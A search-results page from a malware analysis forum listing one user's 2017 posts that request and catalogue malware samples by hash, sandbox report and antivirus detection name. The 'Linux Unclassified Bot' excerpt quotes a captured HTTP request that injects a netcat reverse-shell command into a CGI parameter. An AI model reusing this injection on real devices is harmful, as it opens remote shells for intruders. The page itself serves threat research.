A forum for reverse engineering, OS internals and malware analysis 

Search found 45 matches

 Go to advanced search

Re: TrojanSpy:MSIL/Lachemp.A sample request

 by K_Mikhail ¦  Sun Aug 06, 2017 5:01 pm ¦  Forum: Completed Malware Requests ¦  Topic: TrojanSpy:MSIL/Lachemp.A sample request ¦  Replies: 2 ¦  Views: 8599

BTW, HEUR:Trojan.MSIL.Tpyn.chu (Kaspersky) can also be reproduced on SHA1: 2d3de82a04024b124411fb764cee44b803996a57 sample, which is EternalRocks malware family.

Linux Unclassified Bot

 by K_Mikhail ¦  Sat Jul 15, 2017 7:42 pm ¦  Forum: Malware ¦  Topic: Linux Unclassified Bot ¦  Replies: 1 ¦  Views: 9487

Hello! Found on: https://detux.org/report.php?sha256=8c56e2971649d137917e0e1b45985473e68e803bd374c8a5c0b4c4decdb4751a GET /set_ftp.cgi?loginuse= &loginpas= &next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+11.11.11.111+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0 GET /ftpt...

Linux PWS Trojan

 by K_Mikhail ¦  Thu Jul 06, 2017 4:41 pm ¦  Forum: Malware ¦  Topic: Linux PWS Trojan ¦  Replies: 0 ¦  Views: 4699

Hello! Found on [1] https://malwr.com/analysis/NmM4NGQ4ZWRiY2I0NDE2NjkxZTgwMWMxOTVkZWI4ZWM/ (unupx) [2] https://malwr.com/analysis/MWJmZWE5N2ZlZWFiNDExMzlmN2RhNTJmY2FkYjkwZWY/ (upx) Detection is poor: 1/56 for both of variants: https://virustotal.com/en/file/0e32b7ce2b64b9f993b7431a2b89484c8a3990fcc...

Python/Filecoder.R

 by K_Mikhail ¦  Thu Jul 06, 2017 6:43 am ¦  Forum: Completed Malware Requests ¦  Topic: Python/Filecoder.R ¦  Replies: 1 ¦  Views: 3550

Hello!

I'm looking for Python/Filecoder.R sample, which was mentioned in this article: https://www.welivesecurity.com/2017/06/ ... t-ukraine/

SHA1: AF07AB5950D35424B1ECCC3DD0EEBC05AE7DDB5E

Thanks for assistance!

Re: OSX Kirino (BigFive) BackDoor

 by K_Mikhail ¦  Mon Jul 03, 2017 6:16 pm ¦  Forum: Malware ¦  Topic: OSX Kirino (BigFive) BackDoor ¦  Replies: 2 ¦  Views: 5639

Mac.BackDoor.BigFive.1, Mac.BackDoor.BigFive.2, Mac.BackDoor.BigFive.3 renamed on Mac.BackDoor.Kirino.1, Mac.BackDoor.Kirino.2, Mac.BackDoor.Kirino.3.

OSX Kirino (BigFive) BackDoor

 by K_Mikhail ¦  Mon Jul 03, 2017 10:59 am ¦  Forum: Malware ¦  Topic: OSX Kirino (BigFive) BackDoor ¦  Replies: 2 ¦  Views: 5639

Subj [1] https://virustotal.com/en/file/2ccd0e9df8c2411dfe60b76edb25607193bfb316acac21b7250be65c37215ca3/analysis/1499079161/ (HEUR:Exploit.OSX.CVE-2016-4625.a || Exploit.CVE-2016-4625.1 || a variant of OSX/Exploit.CVE-2016-4625.B) [2] https://virustotal.com/en/file/5b13a275c3d33465a5c323558b1bf8bbb...

Re: Old osx worm "Niqtana"

 by K_Mikhail ¦  Thu Jun 29, 2017 9:03 am ¦  Forum: Completed Malware Requests ¦  Topic: Old osx worm "Niqtana" ¦  Replies: 2 ¦  Views: 9960

Hello!

http://contagiodump.blogspot.com/2012/0 ... lware.html

2007 Worm.OSX.Niqtana.a 2C25908053ECC1474D2FB2C530EA5CFA

Re: Possibly OS/X Ransomware (File coder)

 by K_Mikhail ¦  Thu Jun 15, 2017 1:52 pm ¦  Forum: Malware ¦  Topic: Possibly OS/X Ransomware (File coder) ¦  Replies: 5 ¦  Views: 14123

Thanks for attaching file!

Despite on screaming alarm-string, in fact, the file has been marked as clean by Dr.Web's and KL's viruslabs.

Re: Linux/FileCoder (Linux.Encoder)

 by K_Mikhail ¦  Tue Jun 13, 2017 7:58 am ¦  Forum: Malware ¦  Topic: Linux/FileCoder (Linux.Encoder) ¦  Replies: 18 ¦  Views: 52224

SHA1: d7b0255d7d98c33a30fe71543ec98d802c2a2dd7 FileCoder.O (NOD32) || Ransom:Linux/Erebus.A: https://www.virustotal.com/en/file/d889734783273b7158deeae6cf804a6be99c3a5353d94225a4dbe92caf3a3d48/analysis/ UPD: SHA1: ffebffc89a0b417e56dea3fdce962ee54f7ce00f : https://www.virustotal.com/en/file/0b7996bc...

Possibly OS/X Ransomware (File coder)

 by K_Mikhail ¦  Mon Jun 12, 2017 8:31 pm ¦  Forum: Malware ¦  Topic: Possibly OS/X Ransomware (File coder) ¦  Replies: 5 ¦  Views: 14123

Hello! Possibly OS/X Ransomware (File coder). [1] https://malwr.com/analysis/MWRiOTVhZmEzMjQ2NGUxYTg1ZWRhMTJkZWY4ODg5YTc/ (Mach-O 64-bit, not downloadable); Alarm-string: "Send me this identifier together with your $$$$ to derypt your file" [2] https://virustotal.com/en/file/4c27249bced8cb185a84671f...